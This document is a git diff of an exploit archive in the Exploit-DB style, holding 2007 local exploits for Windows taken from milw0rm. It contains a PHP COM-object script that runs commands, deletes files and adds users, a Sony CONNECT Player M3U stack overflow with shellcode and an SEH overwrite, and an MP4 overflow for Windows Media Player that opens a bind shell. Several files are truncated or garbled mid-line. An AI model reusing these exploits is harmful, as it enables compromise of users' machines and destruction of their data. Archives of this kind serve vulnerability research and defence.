+    out_file = open(sys.argv[1],'w')
+    out_file.write(vb_proj)
+    out_file.close()
+    print "\nFILE CREATION COMPLETED!\n"
+except:
+    print " \n -------------------------------------"
+    print "  Usage: exploit.py FileName.vbp"
+    print " -------------------------------------"
+    print "\nAN ERROR OCCURS DURING FILE CREATION!"
+
+# milw0rm.com [2007-09-19]
diff --git a/platforms/windows/local/4517.php b/platforms/windows/local/4517.php
index a31db094f..33985c9ea 100755
--- a/platforms/windows/local/4517.php
+++ b/platforms/windows/local/4517.php
@@ -1,44 +1,44 @@
-
    ionCube output:

    ";
-
-echo $MyBoot_ioncube;
-?>
-
-# milw0rm.com [2007-10-11]
+
    ionCube output:

    ";
+
+echo $MyBoot_ioncube;
+?>
+
+# milw0rm.com [2007-10-11]
diff --git a/platforms/windows/local/4553.php b/platforms/windows/local/4553.php
index 4bd2caddc..5917c8958 100755
--- a/platforms/windows/local/4553.php
+++ b/platforms/windows/local/4553.php
@@ -1,68 +1,68 @@
- (sounds good)
-//The windows version of PHP has built in support for this extension. You do not need to
-//load any additional extension in order to use these functions.
-//You are responsible for installing support for the various COM objects that you intend
-//to use (such as MS Word); we don't and can't bundle all of those with PHP.
-
-//mmm... I don't know how many people use Apache and PHP on Windows servers but I suppose there are
-//a lot of users if PHP developers decide to implement COM functions as part of PHP core.
-//take a look here: intitle:phpinfo intext:"php version" +windows (thanks to rgod).
-//Anyway, I think they should take much care on security due to the fact that, through these
-//functions, you can seriously compromise a pc.
-
-//For remote execution you need (naturally) to use a server that is MS based,
-//e.g. Apache for win configured for working with PHP.
-//In this scenario, someone could upload a script and then use it to damnage the server.
-
-//Local execution simply bypass all Windows protections against execution of dangerous
-//COM objects (even kill-bit) due to the fact that the script is executed from a client that
-//does not check these settings.
-
-//php.ini settings:
-//safe_mode = On
-//disable_functions = com_load_typelib
-//open_basedir = htdocs
-
-//Remote execution requires that open_basedir is disabled
-
-$mPath = str_repeat("..\\",20);
-
-$compatUI = new COM('{0355854A-7F23-47E2-B7C3-97EE8DD42CD8}');	//this one uses compatUI.dll
-$compatUI->RunApplication("something", "notepad.exe", 1);	//to run notepad.exe
-
-$wscript = new COM('wscript.shell');				//this one uses wscript.exe
-$wscript->Run("cmd.exe /c calc.exe");				//to run calc.exe
-
-$FSO = new COM('Scripting.FileSystemObject');			//this one uses wshom.ocx
-$FSO->OpenTextFile($mPath."something.bat", 8, true);		//to create a batch file on server... yes,
-																//if you want you can write to this batch file :)
-
-$FSOdelFile = new COM('Scripting.FileSystemObject');		//this one uses wshom.ocx
-$FSOdelFile->DeleteFile($mPath."PathToFiles\\*.txt", True);	//to delete all files with txt extension
-
-$FSOdelFolder = new COM('Scripting.FileSystemObject');		//this one uses wshom.ocx
-$FSOdelFolder->DeleteFolder($mPath."FolderToDelete", True);	//to delete an entire folder
-
-$shgina = new COM('{60664CAF-AF0D-0004-A300-5C7D25FF22A0}');	//this one uses shgina.dll
-$shgina->Create("shinnai");					//to add an user :)
-?>
-
-# milw0rm.com [2007-10-22]
+ (sounds good)
+//The windows version of PHP has built in support for this extension. You do not need to
+//load any additional extension in order to use these functions.
+//You are responsible for installing support for the various COM objects that you intend
+//to use (such as MS Word); we don't and can't bundle all of those with PHP.
+
+//mmm... I don't know how many people use Apache and PHP on Windows servers but I suppose there are
+//a lot of users if PHP developers decide to implement COM functions as part of PHP core.
+//take a look here: intitle:phpinfo intext:"php version" +windows (thanks to rgod).
+//Anyway, I think they should take much care on security due to the fact that, through these
+//functions, you can seriously compromise a pc.
+
+//For remote execution you need (naturally) to use a server that is MS based,
+//e.g. Apache for win configured for working with PHP.
+//In this scenario, someone could upload a script and then use it to damnage the server.
+
+//Local execution simply bypass all Windows protections against execution of dangerous
+//COM objects (even kill-bit) due to the fact that the script is executed from a client that
+//does not check these settings.
+
+//php.ini settings:
+//safe_mode = On
+//disable_functions = com_load_typelib
+//open_basedir = htdocs
+
+//Remote execution requires that open_basedir is disabled
+
+$mPath = str_repeat("..\\",20);
+
+$compatUI = new COM('{0355854A-7F23-47E2-B7C3-97EE8DD42CD8}');	//this one uses compatUI.dll
+$compatUI->RunApplication("something", "notepad.exe", 1);	//to run notepad.exe
+
+$wscript = new COM('wscript.shell');				//this one uses wscript.exe
+$wscript->Run("cmd.exe /c calc.exe");				//to run calc.exe
+
+$FSO = new COM('Scripting.FileSystemObject');			//this one uses wshom.ocx
+$FSO->OpenTextFile($mPath."something.bat", 8, true);		//to create a batch file on server... yes,
+																//if you want you can write to this batch file :)
+
+$FSOdelFile = new COM('Scripting.FileSystemObject');		//this one uses wshom.ocx
+$FSOdelFile->DeleteFile($mPath."PathToFiles\\*.txt", True);	//to delete all files with txt extension
+
+$FSOdelFolder = new COM('Scripting.FileSystemObject');		//this one uses wshom.ocx
+$FSOdelFolder->DeleteFolder($mPath."FolderToDelete", True);	//to delete an entire folder
+
+$shgina = new COM('{60664CAF-AF0D-0004-A300-5C7D25FF22A0}');	//this one uses shgina.dll
+$shgina->Create("shinnai");					//to add an user :)
+?>
+
+# milw0rm.com [2007-10-22]
diff --git a/platforms/windows/local/4583.py b/platforms/windows/local/4583.py
index 64a844aa1..0115cb1ea 100755
--- a/platforms/windows/local/4583.py
+++ b/platforms/windows/local/4583.py
@@ -1,55 +1,55 @@
-#!/usr/bin/python
-#Secunia Advisory : SA27270 
-#Release Date : 2007-10-29
-# Sony CONNECT Player M3U Playlist Processing Stack Buffer Overflow (m3u File) Local Exploit
-# Bug discovered by  Parvez Anwar
-# Exploit Written by TaMBaRuS (tambarus@gmail.com)
-# Tested on:  Sony CONNECT Player (SonicStage) 4.x installed on Windows XP SP2/ 2k SP4
-# Shellcode: Windows Execute Command 
-# Eductional Purposes only  ;) 
-##
-
-from struct import pack
-
-m3u = ("#EXTM3U\nhttp://%s")
-
-shellcode = (
-"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"
-"\x42\x30\x42\x50\x42\x50\x4b\x58\x45\x44\x4e\x33\x4b\x48\x4e\x57"
-"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x38\x4f\x34\x4a\x31\x4b\x58"
-"\x4f\x35\x42\x32\x41\x50\x4b\x4e\x49\x54\x4b\x38\x46\x43\x4b\x58"
-"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x49\x4e\x4a\x46\x58\x42\x4c"
-"\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
-"\x46\x4f\x4b\x53\x46\x35\x46\x42\x46\x30\x45\x57\x45\x4e\x4b\x38"
-"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x48\x4e\x50\x4b\x54"
-"\x4b\x48\x4f\x45\x4e\x51\x41\x30\x4b\x4e\x4b\x58\x4e\x51\x4b\x48"
-"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x52\x46\x50\x43\x4c\x41\x53"
-"\x42\x4c\x46\x56\x4b\x38\x42\x34\x42\x33\x45\x38\x42\x4c\x4a\x47"
-"\x4e\x50\x4b\x38\x42\x44\x4e\x50\x4b\x38\x42\x47\x4e\x41\x4d\x4a"
-"\x4b\x48\x4a\x56\x4a\x30\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b"
-"\x42\x50\x42\x30\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x35\x41\x43"
-"\x48\x4f\x42\x56\x48\x55\x49\x58\x4a\x4f\x43\x38\x42\x4c\x4b\x57"
-"\x42\x35\x4a\x56\x42\x4f\x4c\x48\x46\x50\x4f\x45\x4a\x56\x4a\x49"
-"\x50\x4f\x4c\x38\x50\x30\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x36")
-
-NEXT_SEH_RECORD = 0x909006EB  # JMP SHORT + 0x06
-SE_HANDLER = 0x7CEA53D2       # POP POP RET (SHELL32.DLL/2k SP4)
-
-buf = "PLAY ME"
-buf += "\x3e" * 1062
-buf += pack("
+# Eductional Purposes only  ;) 
+##
+
+from struct import pack
+
+m3u = ("#EXTM3U\nhttp://%s")
+
+shellcode = (
+"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"
+"\x42\x30\x42\x50\x42\x50\x4b\x58\x45\x44\x4e\x33\x4b\x48\x4e\x57"
+"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x38\x4f\x34\x4a\x31\x4b\x58"
+"\x4f\x35\x42\x32\x41\x50\x4b\x4e\x49\x54\x4b\x38\x46\x43\x4b\x58"
+"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x49\x4e\x4a\x46\x58\x42\x4c"
+"\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
+"\x46\x4f\x4b\x53\x46\x35\x46\x42\x46\x30\x45\x57\x45\x4e\x4b\x38"
+"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x48\x4e\x50\x4b\x54"
+"\x4b\x48\x4f\x45\x4e\x51\x41\x30\x4b\x4e\x4b\x58\x4e\x51\x4b\x48"
+"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x52\x46\x50\x43\x4c\x41\x53"
+"\x42\x4c\x46\x56\x4b\x38\x42\x34\x42\x33\x45\x38\x42\x4c\x4a\x47"
+"\x4e\x50\x4b\x38\x42\x44\x4e\x50\x4b\x38\x42\x47\x4e\x41\x4d\x4a"
+"\x4b\x48\x4a\x56\x4a\x30\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b"
+"\x42\x50\x42\x30\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x35\x41\x43"
+"\x48\x4f\x42\x56\x48\x55\x49\x58\x4a\x4f\x43\x38\x42\x4c\x4b\x57"
+"\x42\x35\x4a\x56\x42\x4f\x4c\x48\x46\x50\x4f\x45\x4a\x56\x4a\x49"
+"\x50\x4f\x4c\x38\x50\x30\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x36")
+
+NEXT_SEH_RECORD = 0x909006EB  # JMP SHORT + 0x06
+SE_HANDLER = 0x7CEA53D2       # POP POP RET (SHELL32.DLL/2k SP4)
+
+buf = "PLAY ME"
+buf += "\x3e" * 1062
+buf += pack("tempzip.zip") || die "Can't Write temporary File\n";
-binmode (code);
-print code $zip_data;
-close (code);
-print "\nTemporary file ready, patching..\n";
-my $zip = Archive::Zip->new();
-$zip->read( 'tempzip.zip' ) ;
-$zip->extractMember( 'SYS_49152_MP4_for_MPC.mp4' );
-open(code, "+tempzip.zip") || die "Can't Write temporary File\n";
+binmode (code);
+print code $zip_data;
+close (code);
+print "\nTemporary file ready, patching..\n";
+my $zip = Archive::Zip->new();
+$zip->read( 'tempzip.zip' ) ;
+$zip->extractMember( 'SYS_49152_MP4_for_MPC.mp4' );
+open(code, "+tempzip.zip") || die "Can't Write temporary File\n";
-binmode (code);
-print code $zip_data;
-close (code);
-print "\nTemporary file ready, patching..\n";
-my $zip = Archive::Zip->new();
-$zip->read( 'tempzip.zip' ) ;
-$zip->extractMember( 'SYS_49152_MP4_for_mplayer2.mp4' );
-open(code, "+));
-print "\nAddress added, have fun!\n";
-close (code);
-#indeed this sploit could have been written better without the ret address hassle,
-#but it's intended to be only a POC, not a weapon for kiddies..
-
-# milw0rm.com [2007-12-08]
+#!/bin/perl
+#
+# Windows media player 6.4 MP4 Stack Overflow
+# 
+# 0-day discovered and exploited by SYS 49152
+# 
+# Tested on win XP SP2 ENG
+# Shell on port 49152
+# 
+# usage:
+# - download this codec in order to manage MP4 content:
+#   http://www.3ivx.com/coral/3ivx_d4_451_win.exe
+# 
+# - open the MP4 file with mplayer2.exe 
+# 
+# SYS 49152
+# gforce(put the @ here)operamail(put the . here)com
+#
+# update:
+# the latest 5.0.1 codec is still vulnerable
+
+
+use Archive::Zip qw( :ERROR_CODES :CONSTANTS ); 
+
+$zip_data = # code 724982
+"\x50\x4B\x03\x04\x14\x00\x00\x00\x08\x00\x56\xAC\x3F\x36\xC5".
+"\xE1\x2E\x98\x9A\x0A\x00\x00\x5C\xC2\x01\x00\x1E\x00\x00\x00".
+"\x53\x59\x53\x5F\x34\x39\x31\x35\x32\x5F\x4D\x50\x34\x5F\x66".
+"\x6F\x72\x5F\x6D\x70\x6C\x61\x79\x65\x72\x32\x2E\x6D\x70\x34".
+"\xED\xD7\x0B\x70\x54\xD5\x19\x07\xF0\xB3\x9B\x8D\x80\x10\x26".
+"\x55\x21\x6A\x29\x46\x40\x4D\x7D\xA4\x9B\x4D\xC8\x83\xA1\x1A".
+"\x62\x72\x49\xD1\x00\x05\x12\x23\x89\x81\x65\x77\x21\xCB\x66".
+"\xB3\xC9\xEE\xE6\x85\x80\x81\x28\x06\x8C\x96\x47\x78\x09\xD4".
+"\xA0\xA0\xC4\x32\x3E\xA0\x15\x47\xA7\x45\xC6\x22\xA6\x2A\x56".
+"\xAD\xF5\xD1\x8A\x15\x15\xA5\x5A\x85\x98\x89\x05\x5F\xFD\x4E".
+"\xEE\x7F\xDD\x55\x47\x4B\x47\xC7\x8E\xFA\xFF\xE9\xC7\x39\xBB".
+"\xF7\xDE\xF3\xF8\xCE\xBD\xE7\x66\x95\x52\xC9\xB3\xC3\x4D\x35".
+"\x45\x19\xE3\x92\x95\xD0\xA5\xBF\x26\xC3\xE1\x0D\x05\xFC\xFA".
+"\xB3\xB2\x74\x25\xF9\x03\x81\x7A\xA9\x55\xF9\xEB\x2B\xDD\xFA".
+"\xAB\xDD\x25\x3F\x39\xB6\xA7\x72\xFA\x21\xA5\xAC\xA5\x4A\x9D".
+"\xB7\x58\x59\x94\xFE\x3F\xEA\x33\x1F\xBE\xF8\x39\x57\x7D\x25".
+"\xAB\x52\x09\x1D\xE1\xA0\xD3\x27\xF5\xF2\xB0\xAF\xAF\xCF\x7E".
+"\xBA\xCF\xDD\x25\xC3\x2D\xD1\xD6\xA4\xDF\xCF\x77\xF1\x3F\xF5".
+"\x9B\x30\xD6\xEF\xF6\x3A\xA5\x92\xEC\x77\x47\xE7\x65\xF6\xB1".
+"\x3D\x5F\x0D\x2C\x55\xC5\x7F\xEC\x3B\xF1\xEC\x4A\x77\x55\x30".
+"\x72\x55\x28\x50\x57\xFD\xB9\x5E\x06\xBD\xE7\xF7\x56\xCF\x96".
+"\x4A\x62\xC8\x6F\x36\x04\xA3\xDC\xE6\xF7\xC3\xDC\x41\xCF\xEC".
+"\x98\x21\x0D\xAA\x0B\x56\x25\x9B\xF5\x41\xBB\x42\xE1\x59\x55".
+"\x52\x9F\x13\x0A\x87\xDC\x31\xE7\x5C\x21\x8B\xE0\xFC\xC2\x34".
+"\xAC\x2A\x51\x17\x32\x3C\x2D\xDD\x13\x72\x87\x74\x25\xAE\xB9".
+"\xB9\x79\x84\x94\x36\x29\x4F\xCB\x1D\xA2\xAC\x43\x95\x75\xEC".
+"\x36\x65\xE9\x7E\x2C\x5E\xBE\xB1\x9E\x92\x78\x92\x14\x16\xC9".
+"\xAB\x3A\x3D\x14\x0E\x87\xA2\xCD\x5A\xFF\x2A\x17\xE9\x7A\x8A".
+"\x74\xEF\xFA\xB4\x13\xB3\xCB\x21\x28\x47\xEA\x21\x9B\xF5\x81".
+"\x55\x72\xDE\xBC\xE8\x0C\xF5\xF5\xAA\xDF\xB7\x14\x4F\xC8\x10".
+"\x3E\x94\x78\x4F\x42\xD7\x77\x4A\xFC\x45\x62\xBB\x44\xB3\x84".
+"\xAC\x91\x65\x09\x8E\x6D\x91\xB8\x43\xE2\x5E\x89\x0D\x38\x77".
+"\x9D\x84\xDC\xB3\x16\x19\xBF\xE5\x16\x89\x36\x89\x3B\x25\x24".
+"\xCD\x96\xF9\x12\x4F\xE2\xF3\xAF\x24\x36\x22\x9E\x95\x78\x59".
+"\x62\x81\xC4\xEF\x25\xCA\x25\x66\x49\xEC\x42\x9F\xB2\xAC\x96".
+"\x22\x89\xB5\x12\xF2\x8C\x58\xF6\xA1\x7E\x2D\xEA\xCB\x25\xEE".
+"\x96\x58\x23\x21\xF9\xB5\xDC\x24\x51\x23\x51\x68\xF6\x6F\x3D".
+"\x59\xCA\x26\x89\xA9\x12\x25\x68\x2B\x5D\x62\xA9\x84\x17\xE7".
+"\xD6\x49\x84\x25\x0C\x89\x3D\x38\xFF\x25\x89\xD7\xF0\xFD\xE5".
+"\x12\x73\x10\x41\x94\xF3\x62\x4A\x37\xDA\xD1\xE3\xBE\x46\xC2".
+"\x83\xF3\xF4\xFC\x57\x20\x16\x49\xDC\x2C\xB1\x43\xE2\x3A\xC4".
+"\x0A\x8C\xBB\x1D\xB9\x5C\x87\xFA\x6F\x70\xAE\xCE\xC7\xAB\x12".
+"\xC7\x31\xC7\x95\x98\x9F\x1F\x79\x89\xE4\x4A\x8F\x73\x31\xAE".
+"\xFD\x2D\xCA\xDF\x49\xBC\x2D\x71\x40\x62\x35\xC6\x37\x37\x66".
+"\x2D\x1F\x91\x78\x00\xF9\x0F\x62\x8D\x1E\x96\x98\x89\xF6\xAB".
+"\x91\xEF\x0D\xC8\x53\x03\xD6\x5E\xB7\x7D\xB5\xC4\x2A\xE4\xE9".
+"\xEF\x12\xFF\xC4\x5A\x2E\xC5\x38\xF4\xFA\x36\x4A\x74\x4A\x5C".
+"\x8F\xF3\x57\x60\x0E\x95\x18\x87\x07\xD7\xD7\x21\x87\xDE\xCF".
+"\xCD\x4B\xF6\x26\x4B\xAB\x44\x87\xC4\x36\x94\xFA\xBA\x85\x38".
+"\xBF\x1A\x9F\x67\x63\x6C\xB5\x68\xB3\x4B\xE2\x6F\x18\xC7\x22".
+"\xF4\x1F\x42\xBE\x97\x21\x5F\x3E\xAC\x59\x10\xED\x34\x63\xDD".
+"\xE6\xE0\xBA\x6B\x31\x57\x7D\x6F\x3F\xAD\xCC\x7B\x79\x31\x72".
+"\x7F\x0D\x42\x5F\x13\xC6\xBC\x17\xA0\xFD\xF9\x68\x57\x1F\xDF".
+"\xAF\xCC\x67\xE1\x6D\xCC\x2B\x88\xF3\x3D\x18\x73\x08\x7D\xEB".
+"\x3E\xCB\xF0\xBD\x5C\x2B\x1B\x8B\xB9\x5E\x0B\x31\xBF\xCA\x98".
+"\x73\xCB\x70\x7E\x1D\x72\x3A\x2F\x66\xAC\xF3\x51\x5F\x8A\xCF".
+"\x7A\x9D\xEF\x97\xB8\x15\x63\x5C\x8D\xB9\xE8\xF1\x5C\x85\x6B".
+"\xFF\x85\x75\x9C\x87\xF5\xD2\xF7\x4A\x40\x99\xCF\x91\x07\x39".
+"\xBD\x3A\x66\x7E\x3A\x97\x1B\xD0\x57\x18\x39\xD0\xF7\xD0\xAB".
+"\x38\xB7\x16\x6B\xF1\x9C\x32\xEF\xE7\x76\xE4\x4C\xDF\x23\x2B".
+"\x91\xFB\x46\xCC\xC9\x17\x73\x4D\x13\xFA\xF3\xE1\x7C\x7D\xAE".
+"\x7E\x4E\x6E\x97\xB8\x51\x99\xF7\xCE\x53\x98\x8F\x1E\x83\xDE".
+"\x43\x1E\x54\xE6\x33\xA2\xEF\xB1\x16\x89\x83\x98\x6B\x15\x72".
+"\x1D\xC0\xBC\xD6\x61\x3D\x36\x21\x07\x0D\x18\xFB\x5E\xB4\xF3".
+"\x3C\xD6\x76\x21\xE6\xA8\xD7\xBA\x15\xE3\x8A\x3C\xCF\x8F\x23".
+"\xFF\x0D\xC8\xFF\x2C\x94\x7E\xCC\xC7\x8D\xB1\xD7\x60\x6E\x01".
+"\x44\x4D\xCC\x5A\x5F\x89\xF5\x69\xC0\x18\x9B\x50\xDF\x86\xF1".
+"\x2F\xC7\xBC\x75\x3B\xF7\x49\x4C\xC6\xDC\xDD\xC8\xE3\x38\x8C".
+"\x77\x22\xD6\xF8\x12\xE4\xEA\x5E\x7C\x97\xA3\xCC\x67\x44\xEF".
+"\xC3\x3F\x97\xB8\x58\xE2\x1E\x89\x6C\xB4\xAF\xE7\x5F\x8C\x75".
+"\xD1\x73\x2A\x45\x2E\x2B\x70\xBE\x5E\x7B\x2F\xE6\x96\xA9\xCC".
+"\x7B\x26\x13\xF9\xE8\xC1\x3A\x1B\xC8\x43\xAE\xC4\x74\x89\x11".
+"\x18\x9B\xCE\x67\x0A\xFA\x5F\x8E\x7C\xEA\x3D\x56\xDF\x1F\x6B".
+"\x90\xCB\xB9\xB8\xB6\x16\x39\xD3\xB9\x99\x81\xEF\x9B\x90\x73".
+"\xBD\x6E\xFA\xDE\x6A\x43\x79\x0E\xD6\x58\xD7\xFF\x8C\x5C\xBC".
+"\xA3\xCC\x7D\xBF\x16\xF9\x7C\x04\x79\xD8\xAA\xCC\x3D\xCC\x8D".
+"\xBC\x36\xC5\xAC\xEB\x2B\xC8\xB9\xBE\xC7\x66\xAA\xE8\x9E\x51".
+"\x83\x35\xD4\xFB\x55\x81\x32\xF7\x3B\x3F\xAE\xD3\xC7\x17\xE1".
+"\xBB\x1B\xD1\x97\x8E\x51\xF2\x9E\xFC\x40\xCA\x91\xC8\x81\xCE".
+"\x91\x43\x22\x49\xA2\x3F\xC6\xE0\xC1\x75\x37\x63\x9C\x8F\xCA".
+"\x73\x6D\x41\xFE\xF4\x7D\xA3\xF7\x21\x7D\x4F\x2D\xC1\x5A\x36".
+"\x23\x27\x3A\x77\x01\xF4\xB7\x18\x9F\x17\x22\xAF\xFA\x39\xBC".
+"\x12\x6D\x57\xA2\x5C\xA4\xA2\x7B\x4A\x64\x4F\xBA\x1E\x75\x2F".
+"\xC6\x57\xA9\xA2\xF7\x9A\xCE\xF5\x24\xE4\x7D\x26\xD6\x7A\x06".
+"\x8E\x4F\xC4\xE7\xC8\x3E\x5A\x87\x5C\xFA\xD1\x46\x0B\xDA\xD4".
+"\x6B\xA8\xDF\x47\x67\x49\xE4\xA1\x3D\xFD\x4E\x8D\xC3\x1C\xF4".
+"\xFD\xFC\x2E\xF2\xA3\xF3\xAC\xF7\x8E\x72\xB4\xA7\xEF\x6D\xBD".
+"\xF7\xBC\xA8\xCC\xF7\x53\x21\xDA\x98\x80\xF9\x85\xB0\xD6\xB3".
+"\x55\x74\xEF\xB9\x09\xDF\xB7\xAA\xE8\xFE\x3D\x17\xB9\xB9\x01".
+"\xE3\xAA\xC3\xB1\x05\x98\x4F\x33\xF2\x77\x0D\xAE\xF3\xA1\xAD".
+"\xC5\x2A\xFA\xEC\xEA\x3D\xEE\x3A\x15\xDD\x67\x1B\xB1\x1E\xEB".
+"\x71\x5D\x0B\xBE\xD3\x7B\xCF\x26\xAC\x7D\xE4\xEF\x9A\x6A\x8C".
+"\xAB\x59\x45\xEF\x5D\x7D\x2F\x05\x91\x23\x1D\x57\x60\x3C\x7E".
+"\xC4\xD5\x2A\xBA\x2F\x35\x62\x8E\x01\xF4\x35\x13\xEB\x73\x05".
+"\xD6\xD8\xA7\xA2\xEF\x09\xBF\x8A\xEE\xC9\x57\x61\x0E\x01\xCC".
+"\xC1\x83\xE3\xB1\xF7\x42\x23\xFA\x5F\x1C\x33\xF7\xF9\x18\x4B".
+"\x10\xE3\x95\xE7\x4B\x1D\xC7\x98\xCA\x90\xBF\x46\xF5\xE9\x5E".
+"\xA6\x7A\x91\x4F\x7D\xFF\xEA\xFB\x59\xEF\x9B\xFA\x5E\x5A\x83".
+"\x6B\x22\xCF\xAF\x0F\x63\x89\x3C\xDF\x2D\xC8\xEF\x92\x98\x39".
+"\xD6\x23\x77\x91\xB5\x5D\x8A\x71\x84\xD0\x47\xE4\x3D\x1D\xD9".
+"\xA3\x6E\xC6\xF5\x7A\x6D\x6E\xC7\xB8\x17\x20\xD7\xBA\x9D\xC8".
+"\xFB\x3C\xF2\x37\x65\xEC\xFB\xB1\x09\xFD\x96\xA3\xAE\x73\x54".
+"\x85\xF6\x9B\x90\xAB\x06\xAC\xB9\x7C\x56\x1B\x43\x61\x57\x00".
+"\x7F\x68\x8F\x94\x3F\x1D\x2E\x91\x78\x5A\xFE\x9C\xCA\x55\xD6".
+"\x93\x12\x94\xF5\x9C\x63\xCA\x9A\x7F\x40\x59\x3D\x15\xCA\x7A".
+"\x7D\xAB\xB2\x6E\x2B\x54\xD6\x47\xAD\xCA\xFA\xC6\x11\x15\xD7".
+"\x6F\xB3\x8A\x3B\xEF\x80\x8A\x1B\x7F\x83\x8A\xAB\x1C\xAB\xE2".
+"\x5A\xD7\xA9\xB8\x3B\x2F\x57\x71\x7F\xBA\x43\xC5\x1D\xBE\x50".
+"\xD9\xFA\x1D\x53\xB6\x73\xFF\xAD\x6C\xF9\x0F\x2B\x9B\xA7\xBF".
+"\xB2\x5D\x9B\xA8\x6C\x9B\x8B\x95\xED\xA1\x6A\x65\x7B\xA9\x5B".
+"\xD9\x3E\x2C\x54\xF1\x67\xBE\xA9\xE2\xC7\xA4\xA9\xF8\xD2\x37".
+"\x54\x7C\xFD\x0E\x15\xDF\xDE\xA6\xE2\x77\x96\xA8\xF8\xA7\x5F".
+"\x96\xD7\x5B\x5C\x9D\x3B\xEC\x94\x6D\xF7\x03\xBF\x27\x1C\xF9".
+"\x99\xF2\x99\xDF\x49\xF2\xDB\x2A\xE8\xAC\xA9\xA9\x8A\xFE\x56".
+"\xB0\xEC\x3C\xEC\x95\x9F\x0F\xF2\x4E\x78\xA0\xB3\xDA\xE9\x97".
+"\x72\x87\xDB\xD9\x77\x71\xDF\xEF\x9B\x49\xF5\x9E\x60\xB8\x2E".
+"\xE8\x49\x73\xA4\x67\x8C\xCE\xCC\xCA\xCE\xB1\x3B\x43\xF1\x56".
+"\x8B\x71\x91\xC5\x62\x14\x1A\xCD\xB9\x86\xFE\xAF\x79\x99\x59".
+"\x34\x9B\xC5\x30\xB3\xB0\x99\xC5\x40\xB3\xE8\x2E\xF8\xFA\x72".
+"\x0B\x26\x17\x94\x15\xE4\x5E\xDA\xFF\x58\xB8\xF5\xAD\x0B\xBA".
+"\x5A\x0E\xDF\xF3\xC2\x3B\x2F\x84\x47\xF5\x94\x2D\x0A\x9D\xFA".
+"\xC8\xF4\x8D\x9B\x5B\xDE\xFA\xF0\x60\xCF\x18\x7B\xC3\xDB\xA9".
+"\xB7\xB9\x2A\x72\xC6\x24\x3D\x71\x70\x61\xD2\x6B\xC7\x9F\xFA".
+"\xC7\x96\x3F\x94\x85\xCE\x5F\x9A\x97\xF4\xF1\xA1\xB2\x86\x37".
+"\x8B\xAA\x93\x3A\x52\x7C\xE5\xD9\x73\x0F\x94\x3F\xBB\x67\x43".
+"\xC9\xF6\x7D\xEB\x1A\x8A\x3F\x1A\x7C\xFF\xD2\x9D\xBB\x93\x3E".
+"\x3E\x58\xD6\xB0\xAF\xA8\xE4\xB9\xF3\xD7\x1B\x9B\x26\xEC\xAD".
+"\x4F\x4A\xB9\x73\x61\xF3\x43\xF1\xBE\xF1\x7B\x8B\xCE\xD8\x7E".
+"\xFE\x92\x92\xA4\xA7\x5E\x7C\x3F\xE9\x95\xFD\xB6\x9E\x9F\xB5".
+"\x4E\xAB\x39\x9A\xD3\x76\xBC\xBB\xC3\x71\xF7\xAA\xBB\x2E\x7A".
+"\x77\xD5\xFA\xC1\xAE\xDA\xBB\x56\xD4\x5E\xF5\xD1\xC9\xAE\x86".
+"\xF5\xCF\x34\xED\x1B\xBF\xAB\xFD\xB6\x55\xF6\x5F\x57\x0C\x75".
+"\x14\x6C\x4B\x7F\xFF\xB1\x8A\xC4\x01\x4F\x76\xAF\x1E\xF0\x72".
+"\xF7\x75\x03\x5C\xB5\x1D\x8E\xF2\xCD\x1D\x03\x86\xE4\x4E\x75".
+"\x64\x3F\x78\xDF\x26\x39\x66\x6F\x3B\xB2\x6A\xEB\xE5\x5D\xB3".
+"\xDE\xDF\x51\xB8\x62\xEB\x84\x6E\x5D\x1F\x79\xEA\x99\x6F\x4A".
+"\xFD\xE8\xCA\xC1\x5D\x15\x43\xBB\x7A\x8C\xDD\x1B\x5F\xEF\xCD".
+"\x69\x93\xFA\xD8\xDE\xBD\x1D\x8E\x4F\x1E\x9F\xB4\xBB\xF7\xE8".
+"\x2D\xA1\xC9\x29\x67\xDB\x9F\x4F\x19\xE5\x2B\x9F\x52\xB5\xE5".
+"\x40\x5B\xF6\xE9\xF7\x38\x2E\x4B\xDE\x72\xB2\xFF\x68\xCF\x33".
+"\xD9\x87\x97\x55\xEC\x1C\xEE\x6A\xD8\x94\xB0\xFF\xC8\xDA\x81".
+"\xBD\x1D\x6B\x07\x76\x1D\xC9\x59\xD6\x33\xE8\xAC\x19\x53\xBA".
+"\x73\xDA\x7A\x2B\x72\xFC\xAE\xDA\xA2\x84\x99\x23\xAC\x17\xBB".
+"\x1A\xDA\xA5\xBF\x9F\xB6\xCF\xDF\xB3\x7A\xEB\x84\x8A\xA1\x92".
+"\xC4\x61\xDF\xC0\x42\x7D\xB3\x0C\x22\xA2\xEF\x84\x5C\xE3\xEE".
+"\xFD\x46\x89\x51\x6A\xC4\x0F\x30\x5F\x93\x93\x8D\x32\x23\x3E".
+"\xD1\xAC\xCB\x8B\xF0\x13\xF9\xA7\xD0\x30\x5F\x9C\x85\x5F\x1A".
+"\xB6\x2F\x3B\x30\xD5\xB0\x95\xBE\x6A\x5C\x6A\x5C\xF6\x75\xE2".
+"\xD0\xA1\x43\x27\x32\x95\x13\x3A\x89\x88\xBE\xBB\x0A\xB5\xFF".
+"\xF7\x20\x88\x88\x88\x88\x88\xE8\x7B\xA9\x98\x88\x88\x88\x88".
+"\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88".
+"\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88".
